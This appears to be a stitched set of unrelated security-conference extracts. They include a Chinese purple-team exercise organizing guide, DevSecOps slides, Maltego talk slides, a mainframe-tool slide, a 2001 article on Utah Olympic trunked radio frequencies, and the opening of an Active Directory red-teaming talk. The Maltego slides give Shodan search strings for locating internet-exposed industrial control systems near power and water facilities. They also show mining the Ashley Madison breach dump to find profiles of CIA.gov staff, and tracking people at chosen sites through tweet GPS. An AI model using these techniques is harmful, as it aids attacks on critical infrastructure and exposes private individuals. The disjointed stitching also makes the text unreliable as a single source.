向指挥部报告,由指挥部通知红队在第一时间停止攻
击。指挥部应组织攻、防双方制定攻击演习应急相应
预案,具体应急响应预案在演习实施方案中完善。
实战攻防演习之
紫队视角下的实战攻防演习组织
15
二、前期准备阶段
实战攻防演习能否顺利、高效开展,必须提前做好
两项准备工作,一是资源准备,涉及到场地、演习平
台、演习设备、演习备案、演习授权、保密工作以及
规则制定等;二是人员准备,包括攻击人员、防守人
员的选拔、审核和队伍组建等。
1)资源准备
演习场地布置:演习展示大屏、办公桌椅、攻击队
网络搭建、演习会场布置等;
演习平台搭建:攻防平台开通、攻击方账户开
通、IP分配、防守方账户开通,做好平台运行保障工
作;
演习人员专用电脑:配备专用电脑,安装安全监控
软件、防病毒软件、录屏软件等,做好事件回溯机制;
视频监控部署:部署攻防演习场地办公环境监控,
做好物理环境监控保障;
演习备案:演习组织方向上级主管单位及监管机构
(公安、网信等)进行演习备案;
实战攻防演习之
紫队视角下的实战攻防演习组织
16
演习授权:演习组织方向攻击队进行正式授权,确
保演习工作在授权范围内有序进行;
保密协议:与参与演习工作的第三方人员签署相关
保密协议,确保信息安全;
攻击规则制定:攻击规则包括攻击队接入方式、攻
击时间、攻击范围、特定攻击事件报备等,明确禁止
使用的攻击行为,如;导致业务瘫痪、信息篡改、信
息泄露、潜伏控制等动作;
评分规则制定:依据攻击规则和防守规则,制定相
应评分规则。例如,防守方评分规则包括:发现类、
消除类、应急处置类、追踪溯源类、演习总结类加分
项以及减分项等;攻击方评分规则包括:目标系统、
集权类系统、账户信息、重要关键信息系统加分以及
违规减分项等。
2)人员准备
红队:组建攻击队,确定攻击队数量,每队参与人
员数量建议3-5人、对人员进行技术能力、背景等方面
审核,确定防守方负责人并构建攻击方组织架构,签
订保密协议;向攻击人员宣贯攻击规则及演习相关要
求。
实战攻防演习之
紫队视角下的实战攻防演习组织
17
蓝队:组建防守队,确定采用本组织人员作为防守
人员,或请第三方人员加入,对人员进行技术能力、
背景等方面审核,确定防守方负责人并构建防守方组
织架构。第三方人员签署保密协议,向防守方宣贯防
守规则及演习相关要求。
三、实战攻防演习阶段
(一)演习启动
演习组织方组织相关单位召开启动会议,部署实
战攻防演习工作,对攻防双方提出明确工作要求、制
定相关约束措施,确定相应的应急预案,明确演习时
间,宣布正式开始演习。
实战攻防演习启动会的召开是整个演习过程的开
始,启动会需要准备好相关领导发言,宣布规则、时
间、纪律要求,攻防方人员签到与鉴别,攻击方抽签
分组等工作。启动会约为30分钟,确保会议相关单位
及部门领导及人员到位。
(二)演习过程
演习过程中组织方依据演习策划内容,协调攻击方
和防守方实施演习,在过程中开展包括演习监控、演
习研判、应急处置等主要工作。
实战攻防演习之
紫队视角下的实战攻防演习组织
18
1)演习监控
演习过程中攻方和守方的实时状态以及比分状况
将通过安全可靠的方式接入到组织方内部的指挥调度
大屏,领导、裁判、监控人员可以随时进行指导、视
察。全程对被攻击系统的运行状态进行监控,对攻击
人员操作行为进行监控,对攻击成果进行监控,对防
守方攻击发现、响应处置进行监控,掌握演习全过
程,达到公平、公正、可控的实战攻防演习。
2)演习研判
演习过程中对攻击方及防守方成果进行研判,从
攻击方及防守方的过程结果进行研判评分。对攻击方
的评分机制包括:攻击方对目标系统攻击所造成实际
危害程度、准确性、攻击时间长短以及漏洞贡献数量
等,对防守方的评分机制包括:发现攻击行为、响应
流程、防御手段、防守时间等。通过多个角度进行综
合评分,从而得出攻击方及防守方最终得分和排名。
3)演习处置
演习过程中如遇突发事件,防守方无法有效应对
时,由演习组织方提供应急处置人员对防守方出现的
问题快速定位、分析、恢复保障演习系统或相关系统
实战攻防演习之
紫队视角下的实战攻防演习组织
19
安全稳定运行,实现演习过程安全可控。
4)演习保障
人员安全保障:演习开始后需要每日对攻防方人员
签到与鉴别,保障参与人员全程一致,避免出现替换
人员的现象,保障演习过程公平、公正;
攻击过程监控:演习开始后,通过演习平台监控攻
击人员的操作行为,并进行网络全流量监控;通过视
频监控对物理环境及人员全程监控,并且每日输出日
报,对演习进行总结;
专家研判:聘请专家裁判通过演习平台开展研判,
确认攻击成果,确认防守成果,判定违规行为等,对
攻击和防守给出准确的裁决;
攻击过程回溯:通过演习平台核对攻击方提交成果
与攻击流量,发现违规行为及时处理;
信息通告:利用信息交互工具,如蓝信平台,建立
指挥群统一发布和收集信息,做到信息快速同步;
人员保障:采用身份验证的方式对攻击方人员进行
身份核查,派专人现场监督,建立应急团队待命处置
突发事件,演习期间派医务人员实施医务保障;
实战攻防演习之
紫队视角下的实战攻防演习组织
20
资源保障:对设备、系统、网络链路每日例行检
查,做好资源保障;
后勤保障:安排演习相关人员合理饮食、现场预备
食物与水;
突发事件应急处置:确定紧急联系人列表,执行预
案,突发事件报告指挥部。
四、演习总结阶段
(一)演习恢复
演习结束需做好相关保障工作,如收集报告、清
除后门、回收账户及权限、设备回收、网络恢复等工
作,确保后续正常业务运行稳定。相关内容如下:
1)收集报告
收集攻击方提交的总结报告和防守方提交的总结报
告并汇总信息。
2)清除后门
依据攻击方报告和监控到的攻击流量,将攻击方上
传的后门进行清除。
实战攻防演习之
紫队视角下的实战攻防演习组织
21
3)账号及权限回收
攻击方提交报告后,收回攻击方所有账号及权限,
包括攻击方在目标系统上新建的账号。
4)攻击方电脑回收
对攻击方电脑进行格式化处理,清除过程数据。
5)网络访问权限回收
收回攻击方网络访问权限。
(二)演习总结
演习总结主要包括由参演单位编写总结报告,评
委专家汇总演习成果,演习全体单位召开总结会议,
演习视频编排与宣传工作的开展。对整个演习进行全
面总结,对发现问题积极开展整改,开展后期宣传工
作,体现演习的实用性。
1)成果确认
以攻击方提供的攻击成果确认被攻陷目标的归属单
位或部门,落实攻击成果。
实战攻防演习之
紫队视角下的实战攻防演习组织
22
2)数据统计
汇总攻防方和防守方成果,统计攻防数据,进行评
分与排名。
3)总结会议
参演单位进行总结汇报,组织方对演习进行总体评
价,攻防方与防守方进行经验分享,对成绩优异的参
演队伍颁发奖杯和证书,对问题提出改进建议和整改
计划。
4)视频汇报与宣传
制作实战攻防演习视频,供防守方在内部播放宣
传,提高人员安全意识。
(三)整改建议
实战攻防演习工作完成后,演习组织方组织专业
技术人员和专家,汇总、分析所有攻击数据,进行充
分、全面的复盘分析,总结经验教训,并对不足之处
给出合理整改建议,为防守方提供具有针对性的详细
过程分析报告,随后下发参演防守单位,督促整改并
上报整改结果。后续防守方应不断优化防护工作模
实战攻防演习之
紫队视角下的实战攻防演习组织
23
式,循序渐进完善安全防护措施,优化安全策略,强
化人员队伍技术能力,整体提升网络安全防护水平。
实战攻防演习之
紫队视角下的实战攻防演习组织
24
第三章 实战攻防演习风险规避措施
实战攻防演习前需制定攻防演习约束措施,规避可
能出现的风险,明确提出攻防操作的限定规则,保证
攻防演习能够在有限范围内安全开展。
一、演习限定攻击目标系统,不限定攻击路径
演习时,可通过多种路径进行攻击,不对攻击方所
采用的攻击路径进行限定。在攻击路径中发现的安全
漏洞和隐患,攻击方实施的攻击应及时向演习指挥部
报备,不允许对其进行破坏性的操作,避免影响业务
系统正常运行。
二、除授权外,演习不允许使用拒绝服务攻击
由于演习在真实环境下开展,为不影响被攻击对象
业务的正常开展,演习除非经演习主办方授权,否则
不允许使用SYN FLOOD、CC等拒绝服务攻击手段。
三、网页篡改攻击方式的说明
演习只针对互联网系统或重要应用的一级或二级页
面进行篡改,以检验防守方的应急响应和侦查调查能
力。演习过程中,攻击团队要围绕攻击目标系统进行
实战攻防演习之
紫队视角下的实战攻防演习组织
25
攻击渗透,在获取网站控制权限后,需先请示演习指
挥部,演习指挥部同意后在指定网页张贴特定图片(
由演习指挥部下发)。如目标系统的互联网网站和业
务应用防护严密,攻击团队可以将与目标系统关系较
为密切的业务应用作为渗透目标。
四、演习禁止采用的攻击方式
实战攻防演习中的攻防手法也有一些禁区。设置禁
区的目的是确保通过演习发现的信息系统安全问题真
实有效。一般来说,禁止采用的攻击方式主要有三种:
1)禁止通过收买防守方人员进行攻击;
2)禁止通过物理入侵、截断监听外部光纤等方式
进行攻击;
3)禁止采用无线电干扰机等直接影响目标系统运
行的攻击方式。
五、攻击方木马使用要求
木马控制端需使用由演习指挥部统一提供的软件,
所使用的木马应不具有自动删除目标系统文件、损坏
引导扇区、主动扩散、感染文件、造成服务器宕机等
破坏性功能。演习禁止使用具有破坏性和感染性的病
实战攻防演习之
紫队视角下的实战攻防演习组织
26
毒、蠕虫。
六、非法攻击阻断及通报
为加强对各攻击团队攻击的监测,通过攻防演习平
台开展演习全过程的监督、记录、审计和展现,避免
演习影响业务正常运行。演习指挥部应组织技术支持
单位对攻击全流量进行记录、分析,在发现不合规攻
击行为时,阻断非法攻击行为,并转由人工处置,对
攻击团队进行通报。
实战攻防演习之
紫队视角下的实战攻防演习组织
27
附录 奇安信实战攻防演习组织经验
2018年至2019年上半年,奇安信已参与组织实战
攻防演习56次,在演习组织上投入的工作量达1463人
天。组织演习的对象包括部委、省市级政府、省公安
和网信等主管机构,以及银行、交通、能源、民生、
传媒、医疗、教育、生态、烟草、互联网公司等行业
单位。演习的目标系统涵盖内外网、网站、大数据平
台、交易系统、管理系统、工控系统、财务系统等各
类业务系统和生产系统。
在所组织的实战攻防演习中,发现超过2300余台
业务数据库、ERP系统、堡垒机、域控制器、测试系统
等核心业务系统或服务器的权限可被获取,有效检验
了参演客户在技术、管理、运营等方面存在的网络安
全隐患。
实战攻防演习之
紫队视角下的实战攻防演习组织
29 | pdf |
全生命周期开发安全的旧瓶与新酒
杨廷锋 @安恒信息
传统的S-SDLC
需求
设计
编码
测试
调研
安全需求
威胁建模
安全设计
安全编码
代码审计
设计用例
漏洞扫描
上线
安全测试
基线检查
运行
监测
应急响应
业务/开发团队
运维团队
传统的S-SDLC
需求
设计
编码
测试
上线
运行
SDLC
·
目前的S-SDLC服务以
文档为主,难以闭环
具体代码实现问题
从目前的服务来看在
落地过程中需要大量
的人力投入。但是内
容都是重复性工作,
没有时间深入挖掘漏
洞。
部分设计可能过于专
业,普通的需求经理
和开发人员无法驾驭
整个过程中产生大量
文档,无法迅速转换
成数据,进入到反馈
环。难以适应快速变
化的业务需求
难闭环
难接受
投入大
数据
化低
DevSecOps
DevSecOps
• DevOps经典框架
DevSecOps
•
核心思想:
每个人都对安全负责,将安
全深入到整个软件生命周期。
•
优化沟通交流,注重反馈
需求
设计
编码
测试
上线
维护
DevSecOps
DevSecOps
CA Veracode的调研结果
新酒与S-SDLC
思考方向
1. 能实现自动化的部分尽可能自动
化
2. 将安全工作整合到开发过程
3. 尝试构建标准化基线
4. 文档数据化
5. 尽可能提高开发人员接受程度和
易用性
新酒与S-SDLC
新酒与S-SDLC
安全需求
设计半自
动化生成
安全设
计文档
功能需
求列表
IDE插件
安全设计列
表/平台同
步
编码提示
SDK
配置
闭环安全
设计
本地Java
代码扫描
第三方组
件扫描
容器安全
扫描
应用被动
扫描
源代码扫
描
应用安全
扫描
功能逻辑安
全测试
主机漏洞
扫描
第三方组件
快速扫描
容器安全
快速扫描
资产
管理
风险特征
资产风险
…
源代码
应用扫描
报告聚合
漏洞管理
对接工单
系统
统计分析
新酒与S-SDLC
需求
设计
开发
测试
发布
安全培训
安全需求
Checklist
需求
安全需求核对
安全设计
安全评审会(架
构、组件)
安全编码培训
安全设计培训
安全设计确认
SAST工具检测
组件检测
确认安全设计确
认表
[核心]功能安全
测试
DAST工具检测
DAST工具
检测
SAST工具
检测
组件检测
动态统计
安全测试/专项培训
发布流程
确认
与之前的安全设计核对
开发自行确认
安全测试确认
缺陷信息
缺陷信息
缺陷信息
安全测试确认
根据统计结果,安排培训计划
编码
通用培训
新酒与S-SDLC
对接安全运
维平台,实
现DevSecOps
技术理念的
完全落地。
数据
共享
工具化自动
化减少投入
数据化方便
分析和共享
关注开发体
验,易接受
数据+流程构
成闭环
通过不断调整,形成适合企业自身的S-SDLC落地方案
S-SDLC
SecOps
自动化
SAST
DAST
培训
数据化
DeVSecOps
谢谢!
杨廷锋 @安恒信息 | pdf |
Finding useful and
embarrassing information
with Maltego
ANDREW MACPHERSON
ROELOF TEMMINGH
2017
© WAVESTONE
2
Dealing the Perfect hand
Shuffling memory blocks on z/OS
CICSPwn: tool to pentest CICS middleware on a Mainframe (Remote code
execution, access control bypass, etc.)
ELV.APF : script for escalating privileges using APF libraries on z/OS
(Mainframe)
ELV.SVC : script for looking for « magic » syscalls and abusing them to
achieve root (Mainframe)
Ayoub ELAASSAL
@ayoul3__
Github.com/ayoul3
Agenda
u Intro
u Footprinting - the good the bad and the machines
u Section One:
u Hunting ICS devices online in novel ways
u Section Two:
u Hunting interesting organisations with Databreaches from their networks
u Section Three:
u Identifying individuals at interesting locations
u Questions!
u Beer.
Who am I?
u Andrew MacPherson
u @AndrewMohawk
u 10 yrs at Paterva!
u [email protected]
u Employee number: 00000001
u Tech support -> Webdev -> Win (@Paterva)
u B.Information Science degree (2006)
u With friends like mine…. #draco malfoy #worstfriends #shamecon
u Something about someone with a Maltego hammer
Who was RT?
u Roelof Temmingh
u [email protected]
u (co)Founder SensePost (2000)
u Testing pens for 7 years
u Building tools, writing books, doing talks
u Founder Paterva (2007)
u Managing director
u High level design
u New features
u 14 x BlackHat, 5 x Defcon. Bluehat, Ekoparty, Cansecwest, Ruxcon, etc.
u DCC, UE, FIRST, GovCERT
What is Maltego?
u Tons of tutorials
u Videos too!
HERE BE DEMOS!
u Demo’s rely on:
u Internet connection
u Code working
u Remote API’s working
u Nothing to have changed
u Sacrifices have been made but if you could keep your fingers,
toes and tongues crossed that would help!
u Or you are just gonna get pictures and interpretive dance
Foot printing
101
Domain'
DNS'Name'
MX'
Website'
NS'
IP'Address'
Netblock'
AS'Number'
Sharing'MX'
9'methods'for'finding'
DNS'names'
Sharing'NS'
TLD'expand'
Mirror'
Resolve'IP'
Reverse'DNS'
Historic'DNS'
DNS'Name''
to'Domain'
Block'in''
reverse'DNS'
SPF'records'
Co-hosted'on'IP'
Netblock'to'AS'
AS'to'Netblock'
3'methods'to'take'
IP'to'Netblock'
Expand'Netblock''
to'IPs'
Foot printing
with code
Foot printing
with Buttons
Footprinting
u Gives us:
u Domains
u DNS Names
u IP Addresses
u Netblocks
u AS
u Basic information for targeting
Example
u Energy companies in Las Vegas
u Nevada Energy seems to be the biggest
u NVEnergy.com footprint :)
TLDR; Maltego is awesome for footprinting
ICS devices
u Industrial Control Systems
u Used to operate / automate industrial processes
u Things like:
u Power
u Water
u Manufacturing
u Treatment
u Etc
u Systems you don’t want to break/fall over
Hacking ICS devices
u Not for this talk
u Many talks / Tweets / youtubez
u Targeting
u Devices
u Firewalls
u Protocol
u Etc
u Mostly deal with having access to the
device
u But what if you need to find it first?
ICS Devices … on the Internet?
u They have networking
u Most advise to keep them in an
airgapped lan / offline
u Major Protocols:
u Modbus
u S7
u (Niagara) Fox
u BACnet
u But hopefully there are none
online …right?
Finding ICS devices on shodan
u Google Hacking-esque
u Multiple search strings
u “port: 9600 response code”
u “port:2404 asdu address”
u Results give
u IP Addresses
u Types ( CPU / Model / etc)
u “Locations”
Hunting ICS Devices
u Find all ICS devices
u Try and do attribution
u Is it our target? Yes/No
u This doesn’t really work
u So many different devices/types
u None of them say “NVEnergy main powerplant”
Hunting ICS devices with Maltego and Shodan
u There are many types of ICS
u Instead of doing one lets do all of them at once
u Build “super transform” to find them all
u ? + Search strings
u Domain
u Netblock (net: cidr)
u +whatever shodan keywords
Hunting ICS Devices
u Instead of finding all, lets feed inputs:
u Domain/Netblock/IP
u Woohoo! Footprinting!
u This doesn’t really work either!
u Nothing in NVEnergy?
u Sometimes you do find it:
u Princeton.edu
u Usc.edu
Hunting ICS Devices
u Okay so footprinting is out, what about
other inputs:
u Geo-location?
u GPS near target->ICS
u Example: Las Vegas!
u Better results
u Manual
u Lucky
Hunting ICS Devices
u Manually finding it is a pain in dense areas
u Isolated area?
u 50.754101, 17.881712
u 3km
Hunting ICS Devices
u One power plant/GPS works okay
u What if we want all of them?
u How do we find their locations?
u GEONAMES!
u Can find places (and their co-ordinates)
based on categories like:
u Power
u Water
u …you see where this is going
Demo: Hunting ICS devices
automatically
u Category (eg “Power”, “Water”,etc)
u Gives us locations on a country level
u Gives us ICS devices for a country!
Hunting ICS Devices
u This relies on how good our GEO2IP is
u Is it good?
u “Sometimes”
u Denser Areas
u Better GEO->IP
u Less populated areas
u Worse, but is that okay?
Breaches
u Footprinting ICS devices lets us find interesting infrastructure to target
u But what about people?
u What about people who work at interesting places
Breaches
u Breaches Happen.
u Breaches are often used to do basic audits of companies
u How many employee’s (based on our domain)
u How many company cards
u Etc etc
u Plenty of work is done on this already via the usual sources ( blogs /
“Big Data” white papers, etc )
u AshMad as an example ->
AshMad? Maltego MDS
u Free Beta at the moment
u I cant speak forever!
u Just one way you could get data in, others:
u Public TDS ( free! )
u Local Transforms ( free! )
u Import Graph from Table ( beer! )
u Requires:
u Datasource ( MySQL / Splunk / MSSQL / etc)
u Query
u Mapping
u Takes each row returned and maps to entities
Fixing Ashley Madison dump
u Ashley Madison dump is great for doing
email->profile
u But its not really good for doing:
u Domain -> profiles
u Slow, needs a new col referencing the
domain
u Limits subdomains ( you’d need to know
em)
u IP Address -> profiles
u ‘signupip’ field has lots of entries like
‘196.25.1.1,8’
u Cant use like %% as its too slow
u Netblock -> profiles
u IP addresses are stored as strings
u Need to convert to long
u 68.171.1.1 – 68.171.255.255
u 1152057601 - 1152122879
Ashley Madison dump
u We can interact with it as a “forward”
method via
u Domain -> profile
u Email Address -> profile
u Alias -> profile
u Users don’t register work email
accounts
u (you’d think hey.. State.gov?)
Breaches for interesting targets
u But even if they do.. They definitely
wouldn’t use these sites from work
computers right?
u Footprinting now becomes super
interesting
u Exit Nodes ->
u Wiki Edits ->
u Breach Data ->
u (and the reverse!)
An Example
u CIA.gov
Verification
Shit happens…
But…
u Profile seems too easy
u User / Pass
u Profiles
u etc
u Honeypot? Could be..
Other breaches?
u Friends at SocialLinks
u Many databases
u Lets see what that looks like with our current example…
Other breaches?
u Leaked databases/mail?
u Confirm our footprints!
More People!
u We found ICS devices via GPS
u Found people via footprinting + breaches
u What about people who work at interesting locations? (see 1.)
More People
3 Steps:
1.
Find “interesting” places, the same way we did with ICS
u Geonames + country
2.
Use twitter to search for GPS
u Geo/search
3.
???
4.
Profit
Conclusions
u ICS devices
u Difficult to attribute
u Usually not on the corp network / not visible to Internet
u Easier to find on GPS, but this runs the risk of collateral (which might be okay)
u Breach Data
u Gives a lot more then user details
u Private email addresses (outside org) -> other social networks
u Good for targeting people?
u Exit nodes
u Good for targeting infrastructure as they are likely to have both internal and external
access
Thanks && Questions
u @AndrewMohawk
u [email protected] | pdf |
Olympic-sized Trunking
http://www.signalharbor.com/ttt/01dec/index.html
1 of 8
6/18/2007 14:10
This article first appeared in the December 2001 issue of Monitoring Times.
OLYMPIC-SIZED TRUNKING
The 2002 Winter Olympic Games will begin on February 8, 2002, when
more than two weeks of athletic events will take place in and around Salt
Lake City, Utah. An estimated one and a half million spectators are
expected to attend the Games. As you might imagine, radio will play a big
part in the rapid, smooth and safe functioning of each event. This month I'll
try to describe the major trunked radio networks that will be operating
during the Olympics.
As they have done many times in the past for such large events, the Federal
Communications Commission has delegated the task of radio frequency management and
coordination for the Games. The Salt Lake Organizing Committee (SLOC) will be the
coordinator from December 1, 2001 through March 31, 2002, for the areas in and around
Olympic activities. All broadcasters planning to work in one or more of the four radio zones
(Salt Lake City, Park City, Ogden and Provo) are required to coordinate their use of radio
frequencies through SLOC in order to operate any wireless audio and video, data
communication, two-way or other radio equipment.
Olympic-sized Trunking
http://www.signalharbor.com/ttt/01dec/index.html
2 of 8
6/18/2007 14:10
Olympic-sized Trunking
http://www.signalharbor.com/ttt/01dec/index.html
3 of 8
6/18/2007 14:10
Olympic Safety
Besides broadcasters, public safety personnel will be very busy as well.
The federal government has allocated about $200 million for security at the Olympic Winter
Games, with the potential for more after the events of September 11. In addition, the State of
Utah has contributed $35 million and the SLOC budget has more than $30 million earmarked for
safety.
The Secret Service is the lead agency for security planning. The FBI is tasked with intelligence
gathering and law enforcement response, while the Federal Emergency Management Agency
(FEMA) is responsible for "consequence management," meaning they clean up if anything goes
wrong. At the state level, the Utah Olympic Public Safety Command (UOPSC) is responsible for
coordinating the activities of state and local law enforcement.
All told, there will be on the order of 5,000 to 7,000 law enforcement officers at the Games,
along with several thousand additional security personnel hired through SLOC. Military
personnel will also be on hand to provide assistance, so there should be a great deal of public
safety radio activity.
SLOC, in concert with the State of Utah and the Utah Communications Agency Network
(UCAN) has established a plan for their radio system. More than 7,000 two-way radios are
expected to be in use, operating in either the 150 MHz or 800 MHz bands for both short range
(within an event venue) and more distant communication.
Utah Communications Agency Network (UCAN)
Olympic-sized Trunking
http://www.signalharbor.com/ttt/01dec/index.html
4 of 8
6/18/2007 14:10
UCAN is a quasi-governmental agency created by the Utah State Legislature in 1997 to
construct and operate a modern radio system on behalf of numerous state, local and private
safety organizations. The idea is to transition these users away from older, incompatible systems
in the 150 MHz and 450 MHz bands to a common 800 MHz trunked radio network.
Funding for the roll-out of the system comes from Federal grants, the state coffers, and monthly
user fees of anywhere from $15 to $30 per radio, depending on whether the user is a state agency
or not. In addition, last year Congress approved $5 million for UCAN to upgrade security and
communications equipment for use by law enforcement during the Olympics. Interestingly, the
funding bill also included money to build and operate field-transportable radio direction finding
equipment.
Phase I of the UCAN master plan provides for coverage in Davis, Morgan, Salt Lake, Summit,
Tooele, Utah, Wasatch, and Weber counties, which amounts to about 80 percent of Utah's
population.
Valley Emergency Communications Center
Southwest of Salt Lake City in West Valley City is the Valley Emergency Communications
Center (VECC), which provides dispatch services for 15 fire departments and 8 law enforcement
agencies. 9-1-1 calls from about 20 different municipalities across a 120-square-mile area are
answered at the VECC, averaging 3,500 calls each day. VECC is also the headquarters for
UCAN.
Besides voice, VECC provides data services to police, fire, and rescue units using Cellular
Digital Packet Data (CDPD) technology. Laptop units in vehicles are connected to CDPD
modems and are able to access public safety databases, letting officers run license checks and
warrant requests without the need to talk with a dispatcher.
Future plans include "voiceless dispatch" in which assignments are done over the CDPD
connection rather than by voice. This would free up officers and dispatchers from having to
handle routine messages and allow more information about the assignment to be delivered to the
officer in less time. Information such as mug shots, fingerprints, and photographs could be
delivered at the time of dispatch, allowing the officer to be better prepared for the assignment.
Rather than requiring new base station equipment, the CDPD service uses the existing cellular
telephone network. A vehicle can be equipped with a laptop and CDPD modem for less than
$1800, and monthly service charges from the cellular provider are about $50.
UCAN SmartZone
The UCAN network is a Motorola Type II SmartZone system with a number of sites. Sites are
grouped together into cells, with transmissions being simulcast from each site in a cell. This is a
rather large and complex system, with a lot of frequencies. What follows is a compilation of the
first eleven cells, which handle the majority of calls.
Weber County (cell 1): 866.950, 867.275, 867.300, 867.5875, 867.6125, 867.900, 867.925,
868.2375, 868.2875, 868.9625 and 868.9875 MHz.
Davis County (cell 2): 866.925, 867.175, 867.200, 867.225, 867.450, 867.475, 867.8125,
Olympic-sized Trunking
http://www.signalharbor.com/ttt/01dec/index.html
5 of 8
6/18/2007 14:10
867.8375 (data), 867.850, 868.150, 868.175, 868.600 and 868.850 MHz.
Salt Lake County (cell 3): 866.875, 867.150, 867.175, 867.400, 867.425, 867.6875, 867.725,
868.0875, 868.1125, 868.4125 and 868.5125 MHz.
Utah County (cell 4): 866.725, 866.975, 867.0875, 867.325, 867.375, 867.6625, 867.950,
868.0625, 868.3375 and 868.3625 MHz.
Reservoir Hill (cell 5): 866.0625, 866.3375, 866.6125, 867.1375 and 867.8625 MHz.
Promontory Point (cell 6): 866.2500, 866.5750, 866.7375, 868.3500 and 868.7000 MHz.
Mt. Ogden (cell 7): 866.1500, 866.1875, 866.4375, 866.5500, 866.7625, 866.8000 (data),
868.6250, 868.6500, 868.8750 and 868.9000 MHz.
Morgan Peak (cell 8): 866.1125, 866.3875 and 866.7125 MHz.
Francis Peak (cell 9): 866.4875, 866.2250, 868.6750 and 868.8250 MHz.
Layton (cell 10): 868.750, 868.775, 868.7875 and 868.800 MHz.
Nelson Peak (cell 11): 866.3750, 866.4000, 866.6500, 866.7000, 866.9000 and 868.5500 MHz.
Aeromedical: 17184, 17216, 17248 and 17312
Davis County Fire: 9600, 9632, 9664, 10656, 10688, 10752, 10784, 10816, 10848, 10880 and
10912
Davis County Sheriff: 9312, 9376, 9408, 9728, 11776 and 11776
Orem Police Department: 44604, 44608 and 44672
Tooele County Sheriff: 40000 and 40032
Utah County Fire: 46240
Utah County Sheriff: 46112
Utah Highway Patrol: 9440, 19712 and 19744
Utah State Fire Air: 17184 and 17216
Wastach County Sheriff: 47200, 47264
Weber County Sheriff: 6016 and 6048
Salt Lake County
UCAN is expected to fully interconnect with Salt Lake County's existing radio system, which is
a 800 MHz Motorola system spread across several repeater sites.
Frequencies: 854.5875, 854.7125, 855.4625, 856.2375, 856.7125, 856.9875, 857.2375,
857.4625, 857.7125, 857.9375, 858.2375, 858.4625, 858.7125, 859.2625859.4625, 859.7125,
Olympic-sized Trunking
http://www.signalharbor.com/ttt/01dec/index.html
6 of 8
6/18/2007 14:10
859.7375, 860.2625, 860.7375, 866.0750, 866.3500, 866.6000, 866.6750, 866.8500, 867.2500,
867.7750, 868.0375, 868.4375 and 868.9375 MHz.
Salt Lake City fire talkgroups include 832, 864 and 896 while County fire uses 928, 960, 972,
976 and 992. Medical rescue talkgroups are 1408 and 1440.
Salt Lake City police use talkgroups 672, 704, 720, 736, 768 and 800. County Sheriff calls
appear on a number of talkgroups, including 240, 272, 304, 336, 432, and 416. SWAT and
Special Operations use 608 and 640.
Salt Lake City, Utah
Salt Lake City operates a Motorola Type I system. TrunkTracker listeners should use Fleetmap
E1 P3. Frequencies are 856.7625, 856.9625, 857.7625, 857.9625, 858.7625, 858.9625, 859.7625,
859.9625, 860.7625 and 860.9625 MHz.
Since UCAN, Salt Lake County and Salt Lake City all use Motorola 800 MHz trunked radio
systems, there is a proposal in the works to use a SmartZone OmniLink switch to tie them all
together. This would also allow Department of Justice and Department of the Treasury wireless
networks to be linked in.
Salt Lake City Airport
The Salt Lake City airport runs a Motorola Type II system using frequencies of 856.4875,
856.9875, 857.4625, 857.4875, 858.4875, 859.2375, 859.4875, 860.2375 and 860.4875 MHz.
Talkgroups 1200 and 1360 are used by the Salt Lake City Fire Department, while 528, 530, and
1136 are assigned to the airport medical rescue units. Airport Police are dispatched on talkgroups
592 and 1232 while Operations uses 848 and 880.
Latter-Day Saints Church
Salt Lake City may be best known as the headquarters of the Latter-Day Saints (LDS) Church,
better known as the Mormons. They operate their own Motorola trunked radio system using the
frequencies 855.2625, 855.3375, 855.5625, 856.8375, 857.8375, 858.8375, 859.8375 and
860.8375 MHz.
Orem, Utah
The city of Orem in Utah County is licensed to operate a Motorola Type II system on the
following frequencies: 866.2250, 866.4250, 866.4500, 866.6250, 866.8375, 866.8875, 867.0875,
867.1375, 867.2375, 867.2875, 867.4875, 867.5750, 867.7250, 867.8875, 867.9375, 868.2875,
868.4250, 868.6125, 868.6250 and 868.9000 MHz. Note that some of these frequencies overlap
with UCAN assignments. Could a Utah reader confirm that the Orem system has been absorbed
by UCAN?
Provo, Utah
The city of Provo, also in Utah County, has the following frequencies assigned for a Motorola
Type II system: 851.8125, 852.3875, 854.8875, 855.2625, 855.3375, 855.5375, 855.5625,
855.8125, 856.3875, 856.8625, 856.9125, 857.9125, 858.2125, 858.8875, 858.9125, 859.9375,
Olympic-sized Trunking
http://www.signalharbor.com/ttt/01dec/index.html
7 of 8
6/18/2007 14:10
859.8875, 859.9125, 860.8875, 860.9125, 861.1375 and 865.1875 MHz. The system may also be
absorbed by UCAN.
Hill Air Force Base
Hill Air Force Base in Davis county operates their own Motorola Type II system in the 400 MHz
band. The system follows the UHF standard of 25 kHz steps and has a base frequency of 406.000
MHz. Actual frequencies in use are 406.150, 406.750, 407.250, 407.525, 408.025, 408.550,
408.950, 409.150, 409.750 and 406.2500 MHz.
The base fire department has been heard on talkgroup 10720 while flightline operations is on
9760.
Tooele, Utah
Perhaps reduced in size by now, the world's largest single stockpile of chemical weapons is
located 45 miles southwest of Salt Lake City in a town called Tooele (pronounced too-ELL-ah)
at the Army's Desert Chemical Depot. Since 1996 Tooele's mission has been to safely incinerate
the thousands of tons of U.S. chemical weapons.
The depot is reported to operate a five-channel Motorola Type II system on the following UHF
frequencies: 406.350, 407.150, 407.950, 408.750 and 409.550 MHz.
Computerized Talkgroup Logging
While scanning trunked frequencies, it is often a manual chore to write down each talkgroup that
appears on the scanner display. A MT reader just might have the solution for this problem.
Dan,
I am a MT subscriber and I enjoy reading your Tracking the Trunks section. I
have written a program for the Bearcat 245XLT and 780XLT scanners that
may be of interest to your readers. I am a programmer by profession but I
also write my own software as part of my radio hobby.
I originally wrote the program for my own use to collect new IDs for my web
page. I decided to release it as freeware so that others may get some use
from it. The software can be found at:
http://personal.lig.bellsouth.net/lig/k/d/kd5eis/IDTracker/IDTracker.htm
David, K5DMH
Baton Rouge, LA
David's software runs under Microsoft Windows and requires a serial connection to either a
Bearcat 245XLT or a 780XLT. Talkgroup IDs from Motorola or EDACS systems are displayed
and optionally logged to a disk file. His web page has comprehensive explanations of the
program's features and an easy-to-use download section.
That's all for this month. I welcome your electronic mail messages at dan @
signalharbor.com, and there is more information on my web site at
www.signalharbor.com. Until next time, happy monitoring!
Olympic-sized Trunking
http://www.signalharbor.com/ttt/01dec/index.html
8 of 8
6/18/2007 14:10
Comments to Dan Veeneman
Click here for the index page.
Click here for the main page. | pdf |
Beyond the MCSE:
Red Teaming Active Directory
Sean Metcalf (@Pyrotek3)
s e a n @ adsecurity . org
www.ADSecurity.org
About Me
Founder Trimarc, a security company.
Microsoft MCM (AD) & MVP
Speaker:
BSides, Shakacon, Black Hat, DEF CON, DerbyCon
